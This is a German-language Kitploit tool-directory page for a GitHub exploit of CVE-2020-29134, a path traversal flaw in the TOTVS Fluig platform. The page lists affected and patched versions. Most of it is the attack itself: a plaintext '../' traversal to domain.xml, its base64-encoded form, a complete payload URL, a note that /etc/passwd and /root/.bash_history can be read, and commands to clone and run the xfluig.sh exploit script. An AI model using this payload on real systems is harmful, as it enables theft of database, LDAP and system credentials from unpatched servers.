Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ls4ss/cve-2020-29134
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubls4ss/cve-2020-29134

CVE-2020-29134

Exploit für CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal

Repository anzeigen
313vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Totvs Fluig Plattform

root@kitploit:~
 Fluig ist die Produktivitäts- und Kollaborationsplattform, die in das ERP-System integriert,
 und in die anderen Systeme Ihres Unternehmens, um die Art und Weise, wie Sie und Ihr Team arbeiten, zu revolutionieren.

CVE-2020-29134

root@kitploit:~
 Die TOTVS Fluig Plattform ermöglicht Pfad-Traversal über einen base64-kodierten Parameter.
 Wenn ausgenutzt, erlaubt diese Schwachstelle das Lesen sensibler XML-Dateien, die
 Daten für den Datenbankzugriff und in einigen Fällen LDAP-Verbindungen und ERP-Systemintegrationen enthalten.
 Darüber hinaus ist es auch möglich, Systemdateien wie /etc/passwd und /root/.bash_history auszulesen.
 

Betroffene Versionen

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

Behobene Versionen

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (Patched)
<== Fluig 1.6.5-210308 (Patched)
<== Fluig 1.6.4-210308 (Patched)

Payload erstellen

alt text

Angriffsvektor

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

Pfad-Traversal im Klartext

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

Pfad-Traversal base64-kodiert

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

Payload

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Exploit-DB Referenz

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

Repository klonen

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

Verwendung

root@kitploit:~
 Bsp1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (Anzahl der von wfuzz generierten Anfragen)

 Bsp2: ./xfluig.sh http://fluig.host.com:PORT
Tool herunterladen